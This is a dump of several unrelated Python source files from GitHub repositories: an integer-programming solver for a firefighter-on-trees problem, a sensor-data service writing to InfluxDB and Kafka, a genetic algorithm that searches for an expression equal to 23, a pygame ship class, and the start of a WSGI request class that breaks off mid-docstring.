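leaves = [v for v in T.nodes if T.in_degree(v) != 0 and T.out_degree(v) == 0]
paths = {leaf: [leaf] + [a for a in nx.ancestors(T, leaf) if a != 0]
         for leaf in leaves}
assert paths[3] == [3, 1] and paths[2] == [2]
```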
np.std(node_size)\n saved_mean.append(m)\n saved_std_dv.append(std)\n saved_std_dv=np.asarray(saved_std_dv)\n saved_mean=np.asarray(saved_mean)\n\n print(saved_mean)\n print(saved_std_dv)\n\n numpy.save(self.path / \"Statistics_ILP\", numpy.array([saved_mean, saved_std_dv, time_mean, time_std_dv]))\n y= np.arange(0,len(time_mean), 1, dtype=int)\n fig, ax = plt.subplots(1)\n ax.plot(y,saved_mean, label=\"Mean saved Vertices\",color=\"blue\")\n ax.set_title(\"ILP Mean Saved Vertices\")\n ax.set_xlabel('Tree Size')\n ax.set_ylabel('Saved Vertices')\n ax.fill_between(y, saved_mean-saved_std_dv,saved_mean+saved_std_dv,facecolor=\"blue\",alpha=0.5)\n plt.savefig(self.path / 'ILP_Saved.png')\n\n fig, ax = plt.subplots(1)\n ax.plot(y, time_mean, label=\"Mean Time Vertices\", color=\"red\")\n ax.set_title(\"ILP Mean Runtime\")\n ax.set_xlabel('Tree Size')\n ax.set_ylabel('Runtime (s)')\n ax.fill_between(y, time_mean - time_std_dv, time_mean + time_std_dv, facecolor=\"red\", alpha=0.5)\n plt.savefig(self.path / 'ILP_Time.png')\n\n\n def solve_pulp(self):\n for root, directories, files in self.w_path:\n directories.sort()\n for directory in directories:\n print(\"\\n\\nCompute solution for {n}\".format(n=directory))\n instance = generateInstance(self.load, self.path, str(directory))\n T = instance[0]\n N = instance[1]\n starting_fire = instance[2]\n T_Ad_Sym = instance[3]\n seed = instance[4]\n scale = instance[5]\n a_x_pos = instance[6]\n a_y_pos = instance[7]\n self.max_degree.append(instance[8])\n self.root_degree.append(instance[9])\n\n # Check and change LP Solver\n #solver_list = pl.listSolvers(onlyAvailable=True)\n #print(solver_list)\n # Build Node Structure for LP\n Nodes = list(T.nodes)\n Nodes.remove(starting_fire)\n Nodes.remove(N)\n\n # Pre-Compute Data\n ###########################################################################################################\n # Pre-Compute Burning_Times for each node in T\n levels = nx.single_source_shortest_path_length(\n T, starting_fire\n ) # Obtain Level in Tree for each node\n ############################################################################################################\n\n # Create LP Problem\n prob = pl.LpProblem(\"Moving_Firefighter_Tree\", pl.LpMaximize)\n\n # Create Decision Variables: (X_k,u,v)\n # Create all edges (without initial position)\n all_edges = []\n for node1 in Nodes:\n for node2 in Nodes:\n # if node1 != node2:\n edge = [node1, node2]\n all_edges.append(edge)\n edge_number = len(all_edges)\n\n # Create all edges for initial position\n all_initial_edges = []\n for node1 in Nodes:\n edge = [N, node1]\n all_initial_edges.append(edge)\n\n # Create all phases for all edges without initial pos\n variables = []\n # Array Containing all edges per phase\n phases = [x for x in range(1, N + 1)] # Array of total phases (Max node number)\n\n for phase in phases:\n edges_per_phase = {}\n for edge in all_edges: # Here, we fill all edges in this phase\n x = edge.copy()\n x.append(phase)\n if edge[0] == edge[1]:\n edges_per_phase[str(x)] = \"f\"\n else:\n edges_per_phase[str(x)] = edge[1]\n variables.append(edges_per_phase)\n\n # Pre-Compute cardinality of a node sub-tree (saved nodes if defended)\n weights = {}\n for node in Nodes:\n weights[node] = len(nx.descendants(T, node)) + 1\n weights[\"f\"] = 0\n\n items_per_phase = []\n for phase in phases:\n items_per_phase.append(variables[phase - 1].keys())\n\n # Create initial phase for all edges\n variables_init = {}\n for node in Nodes:\n x = [N, node]\n x.append(0)\n 
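`solve_pulp` above keeps its binary decision variables in string-keyed dictionaries built with `pl.LpVariable.dicts` and combines them with `pl.lpSum`. A minimal, self-contained example of that PuLP pattern, solved with the CBC solver bundled with PuLP (keys and weights are toy values shaped like `variables_init`):

```python
import pulp as pl

prob = pl.LpProblem("toy_defence", pl.LpMaximize)
items = ["[5, 1, 0]", "[5, 2, 0]"]              # string keys, as in variables_init
x = pl.LpVariable.dicts("Defend", items, 0, 1, pl.LpBinary)
weights = {"[5, 1, 0]": 3, "[5, 2, 0]": 1}

prob += pl.lpSum(x[k] * weights[k] for k in items), "Sum_of_Defended_Edges"
prob += pl.lpSum(x[k] for k in items) == 1, "Initial_Edges"

prob.solve(pl.PULP_CBC_CMD(msg=False))
assert pl.value(prob.objective) == 3
```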
variables_init[str(x)] = node\n items_init = variables_init.keys()\n\n # Create Initial Decision Variables for LP with restrictions in range and type\n lpvariables_init = pl.LpVariable.dicts(\"Defend\", items_init, 0, 1, pl.LpBinary)\n\n # Create Decision Variables for LP with restrictions in range and type for each phase\n lpvariables_per_phase = []\n for phase in phases:\n lpvariables = pl.LpVariable.dicts(\"Defend\", items_per_phase[phase - 1], 0, 1, pl.LpBinary)\n lpvariables_per_phase.append(lpvariables)\n\n self.n_variables.append((N-1)+(N-1)*(N-1)*N)\n\n # Sum Decision Variables\n lps = 0\n counter = 0\n\n lps_init = pl.lpSum(\n [lpvariables_init[f] * weights[variables_init[f]] for f in variables_init]\n )\n\n for phase in lpvariables_per_phase:\n lps += pl.lpSum(\n [phase[i] * weights[variables[counter][i]] for i in variables[counter]]\n )\n counter += 1\n\n lps_total = lps + lps_init\n\n # Construct optimization problem\n prob += (\n lps_total,\n \"Sum_of_Defended_Edges\",\n )\n\n count_const = 0\n # Constraints\n #################################################################################################################\n # 1) At phase 0, we only enable at most one edge to be active from p_0 to any node v\n\n first_constraint = pl.lpSum([lpvariables_init[i] for i in variables_init])\n count_const += 1\n prob += (\n first_constraint == 1,\n \"Initial_Edges\",\n )\n\n # 2) From phase 1 to N we only enable at most one edge to be active per phase\n counter = 0\n for lpvariables_ in lpvariables_per_phase:\n cons = pl.lpSum([lpvariables_[i] for i in variables[counter]])\n count_const += 1\n prob += (\n cons == 1,\n \"Edges_Phase_%s\" % counter,\n )\n counter += 1\n\n # 3) At phase 0, we only enable edge transitions that lead B from his initial position p_0\n # to nodes which B can reach before fire does.\n cons_i = pl.lpSum(\n [\n lpvariables_init[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])]\n for i in variables_init\n ]\n )\n cons_d = pl.lpSum([lpvariables_init[i] * levels[int(GDN(i)[1])] for i in variables_init])\n\n count_const += 1\n prob += (\n cons_i <= cons_d,\n \"Initial_Distance_Restriction\",\n )\n\n # 4) From phase 1 to n we enable only edges that lead B to valid nodes from his current position. 
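Constraint 3 above recovers the edge endpoints from each string key with `GDN` (imported from `utils.utils`, not shown in this file). As a purely hypothetical stand-in for illustration, a key such as `"[5, 1, 0]"` can be decomposed like this:

```python
# Hypothetical parser, NOT the project's utils.GDN: it only illustrates how
# "[origin, destination, phase]" string keys can be split back apart.
def parse_key(key):
    return [tok.strip(" []") for tok in key.split(",")]

assert parse_key("[5, 1, 0]")[:2] == ["5", "1"]
```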
The sum of distances\n # from p0 to current position following active edges must be less that the time it takes the fire to reach a node from\n # the nearest fire root.\n # r_init= lpSum([lpvariables_init[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])] for i in variables_init])\n counter = 0\n dist_r_i = cons_i\n dist_r_d = 0\n\n for (\n lpvariables_\n ) in lpvariables_per_phase: # At each loop sum one new phase (Cumulative)\n dist_r_i += pl.lpSum(\n [\n lpvariables_[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])]\n for i in variables[counter]\n ]\n )\n dist_r_d = pl.lpSum(\n [lpvariables_[i] * levels[int(GDN(i)[1])] for i in variables[counter]]\n )\n disable_r = BN * (1 - pl.lpSum([lpvariables_[i] for i in variables[counter]]))\n dist_r_d += disable_r\n count_const += 1\n prob += (\n dist_r_i <= dist_r_d,\n \"Distance_Restriction_%s\" % counter,\n )\n counter += 1\n\n # 5) We only enable one defended node in the path of each leaf to the root\n leaf_nodes = [\n node for node in T.nodes() if T.in_degree(node) != 0 and T.out_degree(node) == 0\n ]\n restricted_ancestors = {}\n for leaf in leaf_nodes:\n restricted_ancestors[leaf] = list(nx.ancestors(T, leaf))\n restricted_ancestors[leaf].remove(starting_fire)\n restricted_ancestors[leaf].insert(0, leaf)\n\n p0 = str(N)\n\n for leaf in restricted_ancestors:\n #print(restricted_ancestors[leaf])\n r = 0\n for node in restricted_ancestors[leaf]:\n # Generate only edges that goes to 'node'\n valid_nodes = Nodes.copy()\n valid_nodes.remove(node)\n valid_edges = [[int(i), int(node)] for i in valid_nodes]\n l = str(node)\n key_init_string = \"[\" + p0 + \", \" + l + \", \" + \"0]\"\n r += lpvariables_init[key_init_string]\n counter = 0\n for lpvariables_ in lpvariables_per_phase:\n valid_edges_tmp = valid_edges.copy()\n for edge in valid_edges_tmp:\n if len(edge) > 2:\n edge.pop(2)\n edge = edge.insert(2, counter + 1)\n valid_edges_keys = [str(element) for element in valid_edges_tmp]\n lpv_edges_phase = pl.lpSum(lpvariables_[i] for i in valid_edges_keys)\n r += lpv_edges_phase\n counter += 1\n #print(r)\n count_const += 1\n prob += (\n r <= 1,\n \"Leaf_Restriction_{l},{n}\".format(l=leaf, n=node),\n )\n\n # 6) If we choose an edge at phase K, next phase must include the last node in the edge, others will\n # be invalid edges.\n\n for element in variables_init:\n initial_pos_var = lpvariables_init[element]\n valid_input_edge = GDN(element)[1]\n sum = initial_pos_var\n keys = []\n for element_ in lpvariables_per_phase[0]: # Phase K+1 = 1\n valid_input_edge_ = GDN(element_)[0]\n if int(valid_input_edge) != int(\n valid_input_edge_\n ): # Restriction over other nodes\n keys.append(element_)\n sum += pl.lpSum(lpvariables_per_phase[0][i] for i in keys)\n count_const += 1\n prob += (\n sum <= 1,\n \"Initial_Continuity_Restriction_{l}\".format(l=element),\n )\n\n rest = 1\n # Now for next consecutive phases\n for node in Nodes:\n # print(\"Analyzing Node {n}\".format(n=node))\n for phase in range(0, N - 1):\n sum = 0\n # print(\"Phase {n}\".format(n=phase))\n keys_k = []\n keys_kp1 = []\n # Sum variables that end in node v at phase K\n for item in items_per_phase[phase]:\n valid_input_edge = GDN(item)[1]\n if int(valid_input_edge) == int(node):\n keys_k.append(item)\n # print(\"Actual Phase\")\n sum += pl.lpSum(lpvariables_per_phase[phase][i] for i in keys_k)\n # print(keys_k)\n # Sum all variables that not start at v at phase k+1\n for item_ in lpvariables_per_phase[phase + 1]:\n valid_input_edge_ = GDN(item_)[0]\n if int(node) != int(valid_input_edge_): # 
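`disable_r = BN * (1 - pl.lpSum(...))` in constraint 4 above is the classic big-M switch: the slack term makes the distance restriction vacuous in phases with no active edge, and vanishes when one is active. A self-contained toy showing the switch in isolation (the travel time and fire deadline are made-up numbers):

```python
import pulp as pl

BN = 10000                                    # big number, as at module top
prob = pl.LpProblem("big_m_demo", pl.LpMaximize)
active = pl.LpVariable("active", 0, 1, pl.LpBinary)

prob += active, "prefer_moving"               # objective: move if feasible
# Travel time 7 must beat a fire deadline of 5 -- only enforced when active:
prob += 7 * active <= 5 + BN * (1 - active), "distance_switch"

prob.solve(pl.PULP_CBC_CMD(msg=False))
assert pl.value(active) == 0                  # 7 <= 5 fails, so the move is off
```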
Restriction over other nodes\n keys_kp1.append(item_)\n # print(\"Next Phase\")\n # print(keys_kp1)\n sum += pl.lpSum(lpvariables_per_phase[phase + 1][j] for j in keys_kp1)\n count_const += 1\n prob += (\n sum <= rest,\n \"Continuity_Restriction_{p},{n}\".format(p=node, n=phase),\n )\n\n # 7) We force solution to start at Agent initial position\n force_init = pl.lpSum(lpvariables_init[i] for i in variables_init)\n force_init_r = pl.lpSum(lpvariables_per_phase[0][i] for i in items_per_phase[0])\n count_const += 1\n prob += (\n force_init >= force_init_r,\n \"Force_Initial\",\n )\n\n # Force consecutive phases\n # for phase in range(0,N-1):\n # force_k=lpSum(lpvariables_per_phase[phase][i] for i in items_per_phase[phase])\n # force_k_p_1 = lpSum(lpvariables_per_phase[phase+1][i] for i in items_per_phase[phase+1])\n # prob += (\n # force_k >= force_k_p_1,\n # \"Force_next_{p}\".format(p=phase),\n # )\n\n ##################################\n\n # The problem data is written to an .lp file\n prob.writeLP(\"ILP_Tree.lp\")\n # The problem is solved using PuLP's choice of Solver (Default is CBC: Coin or branch and cut)\n solver = pl.GUROBI_CMD(options=[(\"Method\", self.config['experiment']['method']),\n (\"NodefileStart\", self.config['experiment']['nodefilestart']),\n (\"Threads\", self.config['experiment']['threads']),\n (\"NodefileDir\", os.getcwd() + '/' + 'gurobi_log'),\n (\"PreSparsify\", self.config['experiment']['presparsify'])])\n tracing_start()\n start = tm.time()\n\n prob.solve(solver)\n\n end = tm.time()\n print(\"Time elapsed solving model {} milli seconds\".format((end - start) * 1000))\n peak = tracing_mem()\n print(\"Memory COnsumed by Model solver: {}\".format(peak))\n\n print(\"Solution Time\")\n print(prob.solutionTime)\n self.times.append(prob.solutionTime)\n\n # The status of the solution is printed to the screen\n print(\"Status:\", pl.LpStatus[prob.status])\n\n # Each of the variables is printed with it's resolved optimum value\n solution = {}\n for v in prob.variables():\n # print(v.name, \"=\", v.varValue)\n solution[v.name] = v.varValue\n\n # The optimised objective function value is printed to the screen\n print(\"Total Saved Trees = \", pl.value(prob.objective))\n self.saved.append(pl.value(prob.objective))\n\n # Nodes that are defended during solution\n sol_nodes = [k for k, v in solution.items() if v == 1]\n\n s = {}\n for u_v_x in sol_nodes:\n x_ = GDN(u_v_x)\n x = re.sub(r\"[\\_]\", \"\", x_[2])\n s[u_v_x] = int(x)\n\n sorted_sol = sorted(s.items(), key=operator.itemgetter(1))\n self.solutions.append(sorted_sol)\n self.n_restrictions.append(count_const)\n\n print('Total Constraints')\n print(self.n_restrictions)\n print('Total Variables')\n print(self.n_variables)\n\n def getSolution(self):\n return self.solutions\n\n def getTimes(self):\n return self.times\n\n def getSaved(self):\n return self.saved\n\n def getVariables_Restrictions(self):\n return self.n_variables, self.n_restrictions\n\n def getDegrees(self):\n return self.root_degree, self.max_degree","repo_name":"MauMontenegro/MFP_T_ip","sub_path":"solvers/ILP_MFF.py","file_name":"ILP_MFF.py","file_ext":"py","file_size_in_byte":30126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35124321918","text":"import configparser as parser\nimport json\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom influxdb_client import InfluxDBClient\n\nclass DataAggrService:\n def __init__(self, DataAggrDao, influxDbUrl, influxDbToken, influxDbBucket, 
influxDbOrg, kafkaProducer):\n self.DataAggrDao = DataAggrDao\n self.influxDbUrl = influxDbUrl\n self.influxDbToken = influxDbToken\n self.influxDbBucket = influxDbBucket\n self.influxDbOrg = influxDbOrg\n self.kafkaProducer = kafkaProducer\n\n properties = parser.ConfigParser()\n properties.read('./config/application.ini')\n service_config = properties['SERVICE']\n self.service_config=service_config\n\n def locationCheck(self):\n result = {\"LOCATION\" : \"LOCATION_VALUE\"}\n return result\n\n def humTemperDataSend(self):\n influxDbClient=InfluxDBClient(url=self.influxDbUrl, token=self.influxDbToken, org=self.influxDbOrg)\n sensorData = self.DataAggrDao.checkHumTemSensor()\n if sensorData['Humidity'] is not None and sensorData['Temperature'] is not None:\n # print(self.service_config['APP_KEY'])\n send2InfluxData = [\"%s,host=%s temperature=%f\" % (self.service_config['GROUP_ID'], self.service_config['DEVICE_ID'], sensorData['Temperature']), \"%s,host=%s humid=%f\" % (self.service_config['GROUP_ID'],self.service_config['DEVICE_ID'], sensorData['Humidity'])]\n # send2InfluxData = [\"jpkim_home,host=raspberrypi temperature=%f\" % (sensorData['Temperature']), \"jpkim_home,host=raspberrypi humid=%f\" % (sensorData['Humidity'])]\n \n # print(send2InfluxData)\n write_api = influxDbClient.write_api(write_options=SYNCHRONOUS)\n write_api.write(self.influxDbBucket, self.influxDbOrg, send2InfluxData)\n influxDbClient.close()\n\n send2KafkaData = {'Humidity':sensorData['Humidity'], 'Temperature':sensorData['Temperature']}\n send2KafkaKey = {'GroupID':int(self.service_config['GROUP_ID']),'DeviceID': int(self.service_config['DEVICE_ID'])}\n print('SendData Key :',send2KafkaKey,'to Kafka Server :',send2KafkaData) \n self.kafkaProducer.send('soildata', key=json.dumps(send2KafkaKey).encode('utf-8'), value=send2KafkaData)\n self.kafkaProducer.flush()\n \n def npkDataSend(self):\n influxDbClient=InfluxDBClient(url=self.influxDbUrl, token=self.influxDbToken, org=self.influxDbOrg)\n sensorData = self.DataAggrDao.checkNpkSensor()\n if sensorData['Nitrogen'] is not None and sensorData['Phosphorus'] is not None and sensorData['Potassium'] is not None:\n send2InfluxData = [\"jpkim_home,host=%s Nitrogen=%f\" % (self.service_config['DEVICE_ID'], sensorData['Nitrogen']), \"jpkim_home,host=%s Phosphorus=%f\" % (self.service_config['DEVICE_ID'], sensorData['Phosphorus']), \"jpkim_home,host=%s Potassium=%f\" % (self.service_config['DEVICE_ID'], sensorData['Potassium'])]\n write_api = influxDbClient.write_api(write_options=SYNCHRONOUS)\n write_api.write(self.influxDbBucket, self.influxDbOrg, send2InfluxData)\n influxDbClient.close()\n \n\n\n\n","repo_name":"armyost/python-collector","sub_path":"service/DataAggr_service.py","file_name":"DataAggr_service.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42872374559","text":"\"\"\" Authors: Hadleigh Schwartz and Katie Dykstra. 
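`humTemperDataSend` above hand-formats InfluxDB line protocol strings (`measurement,tag=value field=value`) before writing them with the synchronous write API, and ships the same reading to Kafka as JSON. A self-contained check of just the formatting step (the ids and readings are made up, matching the names seen in the source's comments):

```python
# InfluxDB line protocol: <measurement>,<tag_key>=<tag_value> <field>=<value>
group_id, device_id = "jpkim_home", "raspberrypi"
temperature, humidity = 21.5, 48.2

lines = [
    "%s,host=%s temperature=%f" % (group_id, device_id, temperature),
    "%s,host=%s humid=%f" % (group_id, device_id, humidity),
]
assert lines[0] == "jpkim_home,host=raspberrypi temperature=21.500000"
```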
This program creates a genetic\nalgorithm that presents the user with a valid equation that solves to 23 and\nkeeps producing generations based on fitnesses until a valid equation that\nsolves to 23 is produced.\n\"\"\"\n\nfrom __future__ import print_function\nimport random\n\n\ndef random_pop():\n\t\"\"\"Cretaes initial population of 20\"\"\"\n\tinit_pop = []\n\n\tfor i in range(20):\n\t\tgenome = \"\"\n\n\t\tfor j in range(0,9):\n\t\t\trand = \"{0:04b}\".format(random.randint(0,13))[::-1]\n\t\t\tgenome += rand\n\n\t\tinit_pop.append(genome)\n\n\treturn init_pop\n\n\ndef genome_to_operators(genome):\n\t\"\"\"Converts from binary to raw function\"\"\"\n\tindivgenome = \"\"\n\ty = 0\n\n\tfor i in range(0,len(genome),4):\n\t\t\ty = int(int((genome[i:i + 4]),2))\n\t\t\tif y == 10:\n\t\t\t\tindivgenome += \"+\"\n\n\t\t\telif y == 11:\n\t\t\t\tindivgenome += \"-\"\n\n\t\t\telif y == 12:\n\t\t\t\tindivgenome += \"*\"\n\n\t\t\telif y == 13:\n\t\t\t\tindivgenome += \"/\"\n\n\t\t\telif y < 10:\n\t\t\t\tindivgenome += str(y)\n\n\treturn indivgenome\n\n\ndef convert_to_valid(genome):\n\t\"\"\"Converts the raw functions to a valid expression\"\"\"\n\ttry:\n\t\t\n\t\tvalid_expression = \"\"\n\t\tcounter = 0\n\t\tchar_type = None\n\t\tprev_type = \"operator\"\n\n\t\tfor x,character in enumerate(genome):\n\t\t\tif (genome[x] == \"+\" or genome[x] == \"-\" or genome[x] == \"*\" \n\t\t\t\tor genome[x] == \"/\"):\n\t\t\t\tchar_type = \"operator\"\n\n\t\t\telse:\n\t\t\t\tchar_type = \"operand\"\n\n\t\t\tif prev_type != char_type:\n\t\t\t\tvalid_expression += genome[x]\n\n\t\t\tprev_type = char_type\n\n\t\t\"\"\"Make sure last character is not an operator\"\"\"\n\t\tif (valid_expression[len(valid_expression) - 1] == \"+\" or valid_expression[len(valid_expression) - 1] == \"-\"\n\t\t\tor valid_expression[len(valid_expression) - 1] == \"*\" or \n\t\t\tvalid_expression[len(valid_expression) - 1] == \"/\"):\n\t\t\tvalid_expression = valid_expression[0:-1]\t\t\n\n\t\treturn valid_expression\n\n\texcept:\n\t\treturn \"fail\"\n\t\n\ndef solve_valid(validexpression):\n\t\"\"\"Solves valid expression\"\"\"\n\tanswer = 0\n\n\tif len(validexpression) == 0:\n\t\treturn answer\n\n\telse:\n\t\tanswer = float(validexpression[0:1])\n\t\tvalidexpression = validexpression[1:len(validexpression)]\n\n\twhile len(validexpression) != 0:\n\t\toperator_operand_pair = validexpression[0:2]\n\n\t\tif operator_operand_pair == '/0':\n\t\t\treturn 0\n\n\t\tvalidexpression = validexpression[2:len(validexpression)]\n\t\tanswer = eval(str(answer) + operator_operand_pair)\n\n\treturn answer\n\n\ndef test_fitness(numbers):\n\t\"\"\"Determines the fitness of each member of the population\"\"\"\n\tfitnesses = []\n\n\tfor num in numbers:\n\t\tfitnesses.append(round(1.0/abs(23.0 - num),4))\n\n\treturn fitnesses\n\n\ndef breeding_recombination(indices_two_mates, pop):\n\t\"\"\"Swaps bits of two mates and replaces them in the current population\"\"\"\n\tmate1 = list(pop[indices_two_mates[0]])\n\tmate2 = list(pop[indices_two_mates[1]])\n\trate = .4\n\trandNumb = random.random()\n\ttemp = \"\"\n\n\tfor i in range(len(mate1)):\n\n\t\tif i % 2 == 0:\n\t\t\ttemp = mate1[i]\n\t\t\tmate1[i] = mate2[i]\n\t\t\tmate2[i] = temp\n\n\tif randNumb < rate:\n\t\tlocation = random.randint(0, 8)\n\t\t\n\t\tfor i in range(4):\n\t\t\tmate1[location*4 + i] = str(random.randint(0,1))\n\t\t\n\tmate2 = ''.join([str(item) for item in mate2])\n\tmate1 = ''.join([str(item) for item in mate1])\n\n\tbred = [mate2, mate1]\n\n\treturn(bred)\n\n\ndef selection(fitnesses, 
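`genome_to_operators` above decodes the genome four bits at a time into digits and arithmetic operators. A compact, self-contained version of the same decoding table (mirroring that function; the reversed-bit encoding in `random_pop` is a separate step):

```python
OPS = {10: "+", 11: "-", 12: "*", 13: "/"}

def decode(genome):
    # Four bits per gene: 0-9 are digits, 10-13 are operators, 14-15 are skipped.
    out = ""
    for i in range(0, len(genome), 4):
        v = int(genome[i:i + 4], 2)
        if v <= 13:
            out += OPS.get(v, str(v))
    return out

assert decode("011010100111") == "6+7"
```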
pop):\n\t\"\"\" Selects two mates at a time based on passed in fitness values.\"\"\"\n\tpopulation = []\n\tvalues = fitnesses\n\tindices = list(range(len(fitnesses)))\n\n\tfor k in range(10):\n\t\tmates = [0, 0]\n\n\t\tif len(values) == 2:\n\t\t\tmates[0] = indices[0]\n\t\t\tmates[1] = indices[1]\n\t\t\t\n\t\telif len(values) == 0:\n\t\t\tbreak\n\n\t\telse:\n\t\t\tf = sum(values)\n\t\t\tp = f / 2.0\n\t\t\tstart = random.random() * p\n\t\t\tindex = 0\n\t\t\tfitness = values[index]\n\t\t\t\n\t\t\tfor i in range(2):\n\n\t\t\t\tpointer = start + i * p\n\t\t\t\tif fitness >= pointer:\n\t\t\t\t\t\n\t\t\t\t\tif i == 1 and index != 0:\n\t\t\t\t\t\tmates[i] = indices[index - 1]\n\t\t\t\t\t\tdel values[index - 1]\n\t\t\t\t\t\tdel indices[index - 1]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tmates[i] = indices[index]\n\t\t\t\t\t\tdel values[index]\n\t\t\t\t\t\tdel indices[index]\n\n\t\t\t\telse:\n\t\t\t\t\tindex += 1\n\n\t\t\t\t\twhile index < len(values):\n\t\t\t\t\t\tfitness += values[index]\n\n\t\t\t\t\t\tif fitness >= pointer:\n\t\t\t\t\n\t\t\t\t\t\t\tif i == 1 and index != 0:\n\t\t\t\t\t\t\t\tmates[i] = indices[index - 1]\n\t\t\t\t\t\t\t\tdel values[index - 1]\n\t\t\t\t\t\t\t\tdel indices[index - 1]\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmates[i] = indices[index]\n\t\t\t\t\t\t\t\tdel values[index]\n\t\t\t\t\t\t\t\tdel indices[index]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tindex += 1\n\t\t\t\t\n\t\tbred = breeding_recombination(mates, pop)\n\t\tmate1 = bred[0]\n\t\tpopulation.append(mate1)\n\t\tmate2 = bred[1]\n\t\tpopulation.append(mate2)\n\n\treturn population\n\n\ndef main():\n\t\"\"\"Executes the above functions\"\"\"\n\tinit_pop = random_pop()\n\tcurrentpop = init_pop\n\tgeneration = 0\n\tcheck = 0\n\n\twhile check == 0:\n\t\tpop_numbers = []\n\n\t\tfor genome in currentpop:\n\t\t\ttooperators = genome_to_operators(genome)\n\t\t\tprint (\"Raw function \" + tooperators)\n\t\t\tvalid = convert_to_valid(tooperators)\n\t\t\t\n\t\t\tif valid == \"fail\":\n\t\t\t\tnew_genome = \"\"\n\n\t\t\t\tfor j in range(0,9):\n\t\t\t\t\trand = \"{0:04b}\".format(random.randint(0,13))[::-1]\n\t\t\t\t\tnew_genome += rand\n\n\t\t\t\tgenome = new_genome\n\t\t\t\ttooperators = genome_to_operators(genome)\n\t\t\t\tprint (\"Raw function \" + tooperators)\n\t\t\t\tvalid = convert_to_valid(tooperators)\n\n\t\t\tprint(\"Corrected: \" + valid)\n\t\t\tsolved = solve_valid(valid)\n\t\t\tprint(\"Solved: \" + str(solved))\n\t\t\tpop_numbers.append(solved)\n\n\t\t\tif solved == 23:\n\t\t\t\tprint(\"DONE on Generation \" + str(generation))\n\t\t\t\tcheck = 1\n\t\t\t\treturn\n\n\t\t\tprint(\"Generation \" + str(generation))\n\n\t\tfitnesses = test_fitness(pop_numbers)\n\t\tnewpop = selection(fitnesses, currentpop)\n\t\tcurrentpop = newpop\n\t\tgeneration += 1\n\n\nmain()\n\n\n\n","repo_name":"Hadleigh-Schwartz/genetic-algorithm","sub_path":"ga2.py","file_name":"ga2.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16950886359","text":"import pygame\r\n\r\nclass Ship:\r\n \"\"\"information about ship.\"\"\"\r\n def __init__(self, tp_game):\r\n \"\"\"attribute about ship.\"\"\"\r\n self.screen = tp_game.screen\r\n self.settings = tp_game.settings\r\n self.screen_rect = tp_game.screen.get_rect()\r\n\r\n self.image = pygame.image.load('images/ship.bmp')\r\n self.rect = self.image.get_rect()\r\n\r\n self.rect.midleft = self.screen_rect.midleft\r\n\r\n self.y = float(self.rect.y)\r\n\r\n self.up = False\r\n self.down = False\r\n\r\n def 
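`test_fitness` above scores each candidate as the reciprocal of its distance to the target 23, so values closer to 23 get larger fitness. A one-line equivalent with a toy check (`main` returns as soon as a perfect 23 appears, before fitness is computed, which is what keeps the division safe):

```python
def test_fitness(numbers):
    # Reciprocal distance to the target: 22 -> 1.0, 13 -> 0.1, and so on.
    return [round(1.0 / abs(23.0 - n), 4) for n in numbers]

assert test_fitness([22.0, 13.0]) == [1.0, 0.1]
```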
update(self):\r\n \"\"\"This method helpfull for ship up and down on screen.\"\"\"\r\n if self.up and self.rect.top > 0:\r\n self.y -= self.settings.ship_speed\r\n if self.down and self.rect.bottom < self.screen_rect.bottom:\r\n self.y += self.settings.ship_speed\r\n\r\n self.rect.y = self.y\r\n\r\n def blitme(self):\r\n \"\"\"this method combine image and screen.\"\"\"\r\n self.screen.blit(self.image, self.rect)\r\n\r\n def center_ship(self):\r\n \"\"\"center the ship on the screen.\"\"\"\r\n self.rect.midleft = self.screen_rect.midleft\r\n self.y = float(self.rect.y)\r\n","repo_name":"noshah/Python_Practice","sub_path":"TargetPractice/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72450892392","text":"# -*- coding: utf-8 -*-\ntry:\n from urlparse import parse_qs\nexcept ImportError:\n from cgi import parse_qs\n\nfrom .data_structures import EnvironHeader\nfrom .cookies import parse_cookie\nfrom .form import parse_form_data\nfrom .utils import lazy_property\n\n\ndef get_host(environ):\n \"\"\"Get real host\n If there is HTTP_X_FORWARDED_HOST in environ, use the value of it.\n \"\"\"\n if 'HTTP_X_FORWARDED_HOST' in environ:\n return environ['HTTP_X_FORWARDED_HOST']\n elif 'HTTP_HOST' in environ:\n return environ['HTTP_HOST']\n\n request_host = environ['SERVER_NAME']\n if (environ['wsgi.url_scheme'], environ['SERVER_PORT']) not in \\\n (('https', '443'), ('http', '80')):\n request_host += ':' + environ['SERVER_PORT']\n\n return request_host\n\n\nclass BaseRequest(object):\n\n def __init__(self, environ):\n self.environ = environ\n\n @lazy_property\n def method(self):\n return self.environ.get('REQUEST_METHOD', 'get').upper()\n\n @lazy_property\n def header(self):\n return EnvironHeader(self.environ)\n\n @lazy_property\n def cookies(self):\n \"\"\"return the cookie.\n The cookie is a dict, user can get the key and value in dict way.\n The key is the cookie name, the value is the cookie value, not the instance of Morsel\n\n The cookies should be like this:\n\n {'session_id': '1', 'test': 'xxx'}\n \"\"\"\n return parse_cookie(self.environ)\n\n @lazy_property\n def request_addr(self):\n \"\"\"Get request address\"\"\"\n # TODO: Add support get real request address when use proxy(HTTP_X_FORWARDED_FOR)\n return self.environ['REMOTE_ADDR']\n\n @lazy_property\n def host(self):\n \"\"\"Get real host address.\"\"\"\n return get_host(self.environ)\n\n @lazy_property\n def path(self):\n path = '/' + self.environ.get('PATH_INFO', '').lstrip('/')\n # TODO 需要改变编码方式\n return path\n\n @lazy_property\n def content_type(self):\n return self.environ.get('CONTENT_TYPE', '')\n\n @lazy_property\n def request_params(self):\n \"\"\"return the request params. Example:\n 1. user try to visit http://example.com/?key=value&a=b, method is GET:\n It will get:\n param = {'key': 'value', 'a':'b'}\n\n 2. 
